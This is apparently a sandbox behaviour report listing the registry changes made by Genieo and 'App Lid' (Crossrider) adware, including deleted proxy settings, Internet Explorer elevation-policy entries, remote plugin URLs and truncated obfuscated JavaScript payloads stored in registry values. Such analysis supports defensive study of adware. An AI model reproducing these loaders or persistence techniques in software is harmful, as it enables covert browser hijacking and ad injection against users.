[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\MS\5\1]
"Result" = "5"

[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\P\98\1]
"Result" = "1"

"InstallTime" = "1422513973"

[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\P\98]
"LastSuccessInst" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\P\98\1]
"Campaign" = "14765"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "10 8B 75 0B 8F 3B D0 01"
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "3E 76 5F 11 8F 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process genupdater.exe:3144 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Genieo\Components\Updater\Genieo]
"PrepEnv" = "0"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"gim394750002_inst" = "0"

[HKCU\Software\Genieo\Components\FirstTime]
"UninstallURL" = "http://www.genieo.com/uninstall"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"

[HKCU\Software\Genieo]
"InstalledVersionUpdater" = "16741"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"framework_dl" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Genieo\Components\Framework\Personalization Framework\Components]
"Upgrading" = "1422513863"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"trayapp_dl" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"jre_dl_and_install" = "0"

[HKCU\Software\Genieo]
"InstalledVersionPartner" = "16741"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"trayapp_inst" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
"WpadNetworkName" = "Network"

[HKCU\Software\Genieo]
"UID" = "{E8BFA998-168D-400E-B9E0-F41B76A5DFC7}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "1A 3B 37 04 8F 3B D0 01"
"WpadDetectedUrl" = ""

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"gim394750002_dl" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "F7 0D 4A 06 8F 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process Vlwgfsqfpaz.exe:3296 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\46]
"Name" = "IETimers"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\246]
"Version" = "15"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\40]
"Version" = "4"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\263]
"Version" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\2]
"Name" = "ie8_fix_1"

[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"UpdateInterval" = "360"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\220]
"Version" = "38"

[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"Name" = "App Lid"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"AppPath" = "%Program Files% (x86)\App Lid"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppPath" = "%Program Files% (x86)\App Lid"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\4]
"URL" = "http://js.ourclientinputsrv.com/plugins/javascripts/jquery-1_7_1_min.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\91]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/91.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\47]
"Version" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\28]
"Name" = "initializer"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\17]
"Version" = "4"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\301]
"Version" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"

[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,345,354,253,102,104,180,184,220,195,200,221,223,234,242,255,262,263,281,288,301,177,91,28"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI2ZTQzNDQ1NjU0NTMwMTE3MGMxOTMxMTEwODU0NGU1MTRiMGIwYzFkMTQ1OTRiNTkxNzE1MDcwMDE5MGEwYzA2NTU1YjE1NWYwODA4MTkwNDA1MGEwYzEyNWExZjBjMTc1NzFhMTEwMTRiMDA0NzQzNTg1YTFhMGQ0YjNjM2IzNTI2M2UzYTMwMmEyMDIwMjYzNjI5MzEyOTNkMjYzNjJkMjEyNzNiMjUyMTMzMzYyYTNjMzYzYjRjMDg1ODFlMDI1NjEzMTEwZDU5NTI1NDRmNDA1NzBjMWIwYzU0M2IzYzI3MjQzYjIyM2EzMTMxMmQyMTMxM2IzNzI0MjEzNjJkMzkyNDIxM2MzYjUwMDcwODFhMTcxZDA0MGQwNzU5MjkyYjMyM2IyYzJiM2EzNjJhMjAzMzI2MmUyMDJkMmIzZDI1MmYyODMzMjYyZTNjMzAzZDNiM2IyYTIwMjkyYjUzNDU2OTU4NDk0NDQzNDYxZTAwMDUxOTEwMmQxYjA4NDE1ZTU2NTYxOTFkMTcwODFhNWU0YzRiMTUxMDFmMGEwMjFiMDEwMTUyNDkxNzVhMTAwMjAyMTUwODBkMGIwMDU4MWExNDFkNGMwYjFjMDY0YzEyNDU0NjQwNTAwMTFjNDYzYjNjMjcyNDNiMjIzYTMxMzEyZDIxMzEzYjMzMmMyNTJjMmQzYzJjMjAzYzM3MjMzNjJlMjAyNzI3MzY0YjBmNGExYzA3NGUxOTBhMWM1NDU1NTM1ZDQyNTIxNDExMTc0NTM2M2IyMDM2MzkyNzIyM2IyYTNjMmMzNjNjMjUyNjI0MmUyNzIyMzUyYzNiM2M0MjA1MGQwMjFkMDYxNTAwMDA1ZTNiMjkzNzIzMjYzMDJiM2IyZDI3MjEyNDJiMzgyNzMwMmMyODI4MmYyMTI0MmIyNDNhMjYyYTM2MmQyNzNiMjk1NjVkNjM0MzU4NDk0NDQxMTQxYTAxMTY\Å–"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\195]
"Name" = "icm_convertmedia_m"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\200]
"Name" = "foxydeal_m"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"CrPublisherId" = "25286"

[HKCU\Software\AppDataLow\Software\Crossrider]
"Verifier" = "705e42e0bb6c74a04369956d99485df5"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\78]
"Version" = "5"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\234]
"Version" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\195]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/195.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\36]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/36.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\2]
"Version" = "2"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\234]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2MzYyNDEwYjA0MTkxNjIyMDIxNDRiNTE0MzQxMTgxOTEyMDc0YTU3NDYwMjEwMTcxMTE5MGYxNDVlMWMwODFmMDIwNTExMWUxMjEwMDUwYTFjNDUwYTBkMTYwMjQ5MTExZjU3MGMwODRjMDAwMjFmNDgxZDAzNDcwMTAyMDc1ZTJmMzIyNTI1M2YyYjNhMzkyYTI3MzUzZjM5MjIyMzNkM2IzNDJhMjcyZjMyNDAwNDA1MWEwMDBmNWUzYzJmMmUzNDM4MjMyYjNiMjIyNzI2MjIzMjIzMmYyNDNkMjcyZjI2MjcyZjNlMzMzNTJmMzEyZDM0M2M0NTEyMDMwNzFhMTU0NTM2MzQyMDMxM2YzZTM1MjUzOTNjMmMzOTNjMjIyMDNkMzkzOTMxMzUyYzM0M2M0NTEyMDEwZjE5MWI0NTRiNDc2OTZhNTIwNTEyMDMwMDBiM2MxOTBmNDE0YTRkNDQxZjA0MGMxOTE4NTk0YzVmMDQxNTAzMTEwYzAwMDg0ZDA3MTExOTA3MTExMTBiMWQwYzE2MTEwNTQzMGYxOTE2MTc0NjBkMGM0YzE1MGU0OTE0MDIwYTQ3MDExMDVjMTgwNDAyNGEyZjI3MmEzOTJjMzAyMzNmMmYzMzM1MmEzNjNlMzAyNjIyMzIyZjMzMmYyNzRmMTgxNjAxMTkwOTViMjgyZjNiM2IyNDMwMzAyMjI0MjIzMjIyMjcyYzMzMzcyNjNlMjkyMzMzMmYyYjNjMjkzYzJhMzQzMjM5NTExMjE2MDgwNjA2NWUyZjMyMjUyNTNmMmIzYTM5MmEyNzM1M2YzOTM2MjAyODM2MjUyMjJlMzUzMjM5NTExMjE0MDAwNTA4NWU1MjQxNmM3ZTUyMDgwNTFlMDQwYTFlMjQwMjU1NGE1ODViNTg1NzRmN2E0ZDQ2NTc1MDVhMWYwZTExMTcxOTBlMDcxYjUyNDI0OTMwNDExMDE4MDI"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM3ZDUzNDk1NjRmNDQxOTBlMDEwNzIyMDEwNTU0NTU0NjUzMTIwMTAzMDc0OTQ2NTkwZTE2MTg1NDFmMTgxYjFmMTAwMTBlMGExZDFmMDE1OTE0MWMwNDU5MGUwMDE3MTMxOTFlMTYwNzBjNTkwYzBhMTgxZjFiMDM0ODE3MDAwNTFiNWI0OTVjMTQwNzA3MmMwMDEyNTIzOTJlMzkyNzM4MjQyMDNiM2YyYjIzMjMyNTM5M2UzMDNiM2QyOTNjMzMzMzI1M2MzMzI4MmM0ZjA1NWU1YjQxNWMwNjQ1NGE0MzRmMDU1YzViNDE1YzFiMTYxYTE2NTQyOTMwMjUyMzM1MjYyNDI1M2EyZDMzM2QzOTMwMmEyNTI4MzkzMjI0MzMzMDM5NTcxZjBkMDMxOTRlMzYyOTJjMzQzZTI5MjYyNTNlMzcyYzI0MzAyMzI5MmUzMDM5MzMzNjJkMjkzYzMzMzMyNTNjMzMyODJjNGI1YTY1NDY1MTVhNTU1NTFmMDcxZDA2MWMzMzAzMTY1NzRkNTc1MTAxMDIxYjE2MDI0MDVhNTgxNjAzMDA1ODA1MDkxZDE2MGMwMDE2MWYwNTEzMWI0ODEyMTUxODU4MTYxNTBmMWYwMzBmMTAwZTEwNTgxNDFmMDAxMzAxMTI0ZTFlMWMwNDAzNGU1MTUwMGUxNjAxMjUxYzEzNGEyYzM2MzUzZDI5MjIyOTI3M2UzMzM2M2IyOTIzMmYzNjMyMjEyODI0MjYyYjI5MjYyMjJlMjU1MzA0NDY0ZTU5NTAxYzU0NGM0YTUzMDQ0NDRlNTk1MDAxMDcxYzFmNDgyODI4MzAzYjM5M2MzNTIzMzMzMTMyMjUyYzI4MjYzZjM5M2YzYjM4MzIyODJjNGYxMzE3MTIxZjQ3MmEyODM0MjEyNjI1M2MzNDM4M2UzMDI1MjgzNjMxMjIyYTI4MzUzZjMxMjgyNDI2MmIyOTI2MjI"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\246]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/246.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\263]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/263.js"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppPath" = "%Program Files% (x86)\App Lid"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"Policy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\AppDataLow\Software\App Lid]
"ActiveAppId" = "65743"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\2]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/2.js"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"Policy" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\9]
"Version" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\43]
"Name" = "IEMessaging"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\345]
"Version" = "6"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\1]
"JavaScript" = "var __a0__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63\x64\x6e\x2e\x6e\x65\x74'].join('')var __a1__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69\x6e\x67\x2d\x61\x70','\x70\x2e\x63\x72\x6f\x73\x73\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a2__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f','\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63','\x64\x6e\x2e\x6e\x65\x74'].join('')var __a3__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69','\x6e\x67\x2d\x61\x70\x70\x2e\x63\x72\x6f\x73\x73','\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a4__ = ['\x68\x74\x74\x70\x3a\x2f','\x2f\x6e\x73\x74\x61\x74','\x73\x2e\x63\x72\x6f\x73','\x73\x72\x69\x64\x65\x72','\x2e\x63\x6f\x6d'].join('')var __a5__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74','\x61\x67\x69\x6e\x67\x2d\x61\x70\x70','\x2e\x63\x72\x6f\x73\x73\x72\x69\x64','\x65\x72\x2e\x63\x6f\x6d'].join('')var __a6__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f','\x75\x72\4Å–"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppName" = "App Lid-buttonutil64.exe"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]8Å–"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)Å–"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\180]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/180.js"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppPath" = "%Program Files% (x86)\App Lid"

[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"homepageurl" = "NA"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\252]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/252.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\281]
"Version" = "2"

[HKLM\SOFTWARE\Wow6432Node\App Lid\Installer]
"BundledFirefox" = "1"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\17]
"Name" = "jQuery"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\200]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/200.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,345,354,253,102,104,180,184,220,195,200,221,223,234,242,252,255,262,263,281,288,301,91"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\46]
"Version" = "5"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\246]
"JavaScript" = "var _0x6ef5=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\281]
"Name" = "ibario_tier3_pops_m"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\44]
"Name" = "IEMisc"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppPath" = "%Program Files% (x86)\App Lid"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\104]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/104.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\47]
"Name" = "resources_background"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"Policy" = "3"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\1]
"Version" = "11"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\28]
"Version" = "4"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\41]
"Version" = "7"

[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"Description" = "Apps Hat is the cool new Android app store that helps you discover hot new apps, both free and discounted. Get personalised recommendations, price drop alerts, and share your favourite apps with your friends."

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\36]
"Name" = "IEBackground"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\38]
"Name" = "IECallbacks"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\207]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/207.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\72]
"Version" = "5"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\207]
"Name" = "dbWrapper"

[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"BgVersion" = "1"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\47]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/47.js"

[HKCU\Software\AppDataLow\Software\App Lid\Plugins\21]
